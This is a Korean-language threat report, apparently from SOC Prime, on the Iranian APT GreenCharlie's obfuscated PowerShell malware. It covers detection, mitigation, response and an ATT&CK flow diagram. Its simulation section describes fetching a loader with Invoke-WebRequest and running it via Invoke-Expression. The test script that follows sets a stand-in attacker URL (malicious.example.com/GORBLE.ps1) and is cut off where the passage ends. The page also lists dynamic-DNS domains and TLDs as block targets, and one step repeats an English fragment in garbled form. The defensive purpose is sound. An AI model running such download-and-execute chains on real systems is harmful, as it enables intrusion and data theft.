SOC Prime Bias: 심각

12 11월 2025 17:00

GreenCharlie: 이란 지원 APT에 의한 PowerShell 익스플로잇에 대한 SOC 보고서

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
GreenCharlie: 이란 지원 APT에 의한 PowerShell 익스플로잇에 대한 SOC 보고서
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

GreenCharlie PowerShell 취약점 요약

GreenCharlie는 다단계 PowerShell 악성코드 계열(GORBLE, TAMECAT, POWERSTAR)을 사용하여 사이버 첩보 활동을 수행하는 이란 기반의 APT 그룹입니다. 이 그룹은 피싱을 위해 여러 동적 DNS 도메인을 등록하고, 사용자 정의 Base64 및 비트 연산 인코딩을 사용하는 난독화된 PowerShell 스크립트를 사용하며, HTTPS POST를 통해 C2 서버와 통신합니다. 활동은 2024년 5월부터 8월 사이에 이란 IP와 VPN 서비스를 통한 트래픽 마스킹으로 급증했습니다.

조사

그룹과 연관된 알려진 DDNS 도메인 및 IP 범위(e.g., *.ddnsgeek.com, *.dns-dynamic.net)에 대한 네트워크 트래픽을 분석하세요. Base64 디코딩 후 비트 연산 NOT 연산을 수행하고, ScriptBlock.Create 또는 Invoke-Expression을 호출하는 PowerShell 실행 체인과 스크립트를 찾아보세요. 프로세스 주입 및 디코딩된 페이로드의 메모리 내 실행을 모니터링하세요. ATT&CK 기법 T1583.001, T1566.002, T1059.001, T1568과 경계를 연결하세요.

완화

엄격한 PowerShell 로깅(ModuleLogging, ScriptBlockLogging)을 구현하고 제한된 언어 모드를 적용하세요. 알려진 DDNS 제공자 및 의심스러운 TLD(.info, .xyz, .icu, .network, .online, .site)에 대한 트래픽을 차단하거나 프록시하세요. 피싱 도메인에 대해 DNS 샌드박싱 및 URL 필터링을 배포하세요. 난독화된 PowerShell 스크립트 및 메모리 내 AES 디코딩을 탐지하기 위해 엔드포인트 탐지 및 대응(EDR) 솔루션을 사용하세요. 서비스 계정에 대한 최소 권한을 적용하고 불필요한 원격 실행 도구를 비활성화하세요.

GreenCharlie 위협에 대한 대응

지표가 감지되면, 영향을 받은 호스트를 격리하고, 휘발성 메모리를 캡처하며, PowerShell 로그를 수집하세요. 포렌식 분석을 수행하여 디코딩된 페이로드를 추출하고 C2 서버를 식별하세요. 손상된 자격 증명을 취소하고 비밀을 교체하며 관련된 예약 작업 또는 영구 메커니즘을 제거하세요. ICS(domain, IP, 해시 값) IOCs의 위협 인텔리전스를 공유하고 탐지 규칙을 업데이트하세요.

graph TB %% 클래스 정의 classDef technique fill:#ffcc99 classDef action fill:#99ccff classDef process fill:#ccffcc classDef data fill:#f0e68c %% 노드 start[“<b>시작</b>: 초기 실행 트리거”] class start action tech_execution[“<b>기법</b> – T1059.001<br/><b>PowerShell</b>: 페이로드를 다운로드하기 위한 스크립트 실행”] class tech_execution technique process_download[“<b>프로세스</b>: 2단계 페이로드 다운로드”] class process_download process tech_obf1[“<b>기법</b> – T1027.008<br/>스트립된 페이로드 (Base64 + NOT)”] class tech_obf1 technique tech_obf2[“<b>기법</b> – T1027.014<br/>폴리모픽 코드 (변형 인코딩)”] class tech_obf2 technique tech_decode[“<b>기법</b> – T1140<br/>페이로드 디코드/역난독화”] class tech_decode technique tech_dns[“<b>기법</b> – T1071.004<br/>DNS 애플리케이션 계층 프로토콜”] class tech_dns technique tech_dga[“<b>기법</b> – T1568.002<br/>도메인 생성 알고리즘”] class tech_dga technique tech_web[“<b>기법</b> – T1102.002<br/>HTTPS 양방향 웹 서비스”] class tech_web technique tech_encrypt[“<b>기법</b> – T1573<br/>AES 암호화 채널”] class tech_encrypt technique data_exfil[“<b>데이터</b>: 시스템 정보 (OS, 컴퓨터 이름)”] class data_exfil data tech_exfil[“<b>기법</b> – T1041<br/>C2 채널을 통한 데이터 유출”] class tech_exfil technique %% 연결 start –>|트리거| tech_execution tech_execution –>|다운로드| process_download process_download –>|난독화 적용| tech_obf1 process_download –>|적용| tech_obf2 process_download –>|디코드됨| tech_decode tech_decode –>|통신 경로| tech_dns tech_dns –>|사용| tech_dga tech_dns –>|통신 경로| tech_web tech_web –>|트래픽 암호화| tech_encrypt tech_encrypt –>|전송| data_exfil data_exfil –>|전송 경로| tech_exfil

공격 흐름

페이로드 시뮬레이션 지침

  • 공격 내러티브 및 명령어:

    단계 1 – 악성 로더 가져오기:
    공격자는 Invoke-WebRequest 를 사용하여 GORBLE.ps1 라는 이름의 PowerShell 스크립트를 C2 서버에서 다운로드합니다.단계 2 – 페이로드 인코딩:
    다운로드된 스크립트에 악성 페이로드가 포함되어 있습니다. 공격자는 전체 스크립트를 base64로 인코딩하고 변수에 저장합니다.$x.단계 3 – 고위험 cmdlet을 통한 실행:
    공격자는 Invoke-Expression을 사용하여 페이로드를 즉석에서 디코딩하여 실행하고, GORBLE 프레임워크를 호출합니다.$x on‑the‑fly and runs it, thereby invoking the GORBLE framework.단계 4 – 수평 이동(선택 사항):
    페이로드는 나중에 비트 연산 NOT으로 난독화된 문자열과 함께 ScriptBlock.Create를 호출하여 원격 호스트에서 2단계 PowerShell 명령어를 실행할 수 있습니다.
  • 회귀 테스트 스크립트:

    # -------------------------------------------------
    # GreenCharlie APT PowerShell 프레임워크 시뮬레이션
    # -------------------------------------------------
    
    # 1. 악성 프레임워크 다운로드 시뮬레이션(키워드 GORBLE)
    $maliciousUrl = "http://malicious.example.com/GORBLE.ps1"
    $downloaded = @"
    # GORBLE - 시뮬레이션된 악성 페이로드